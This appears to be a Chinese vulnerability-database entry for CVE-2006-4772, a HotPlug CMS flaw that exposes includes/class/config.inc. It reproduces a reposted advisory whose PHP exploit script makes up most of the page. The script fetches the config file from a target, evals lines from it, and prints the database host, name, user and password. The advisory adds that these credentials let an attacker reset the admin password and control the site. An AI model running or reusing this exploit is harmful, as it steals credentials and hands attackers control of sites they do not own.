HotPlug CMS 访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193516 漏洞类型 未知
发布时间 2006-09-13 更新时间 2006-09-13
CVE编号 CVE-2006-4772 CNNVD-ID CNNVD-200609-224
漏洞平台 N/A CVSS评分 5.0
|漏洞来源
https://www.securityfocus.com/bid/84152
https://cxsecurity.com/issue/WLB-2006090100
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200609-224
|漏洞详情
HotPlugCMS将敏感信息存储在Web根目录下,但没有充分的访问控制,远程攻击者可以通过直接请求includes/class/config.inc来读取管理密码和数据库凭证。
|漏洞EXP
Hello

HotPlug CMS Config File Include Vulnerability

Discovered by : HACKERS PAL

Copyrights : HACKERS PAL

Website : WwW.SoQoR.NeT

Email : security (at) soqor (dot) net [email concealed]

After Script Url Add

includes/class/config.inc

And you will download the config file ,, so that you will be able to connect by remote connect program to the mysql server and change admin password and be able to control the website..

And This is the exploit if you want :-

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* HotPlug CMS Config File Include Vulnerability exploit

/*                 By : HACKERS PAL

/*                   WwW.SoQoR.NeT

*/

print_r('

/**********************************************/

/*   HotPlug CMS Config File Include Vul      */

/*   by HACKERS PAL <security (at) soqor (dot) net [email concealed]>      */

/*       site: http://www.soqor.net           */');

if ($argc<2) {

print_r('

/* --                                         */

/* Usage: php '.$argv[0].' host             */

/* Example:                                   */

/* php '.$argv[0].' http://localhost/hot    */

/**********************************************/

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

$url=$argv[1];

$exploit="/includes/class/config.inc";

$page=$url.$exploit;

Function get_page($url)

{

if(function_exists("file_get_contents"))

{

$contents = file_get_contents($url);

}

else

{

$fp=fopen("$url","r");

while($line=fread($fp,1024))

{

$contents=$contents.$line;

}

}

return $contents;

}

$page = get_page($page);

if(eregi("<?php",$page))

{

$lines = explode("\n",$page);

$evaled = $lines[50].$lines[51].$lines[52].$lines[53].$lines[54].$lines[55].$lines
[56].$lines[58].$lines[58].$lines[59];

$evaled=str_replace("include","#include",$evaled);

eval($evaled);

Echo "\n[+] Database Name : $db_name";

Echo "\n[+] Database User : $db_user";

Echo "\n[+] Database Host : $db_host";

Echo "\n[+] Database Pass : $db_password";

Die("\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");

}

else

{

Die("\n[-] Exploit Failed\n/* Visit us : WwW.SoQoR.NeT                   */\n/**********************************************/");

}

?>

WwW.SoQoR.NeT
|受影响的产品
Hotplug Cms Hotplug Cms 0
|参考资料

来源:BUGTRAQ
名称:20060911HotPlugCMSConfigFileIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/445761/100/0/threaded
来源:SREASON
名称:1572
链接:http://securityreason.com/securityalert/1572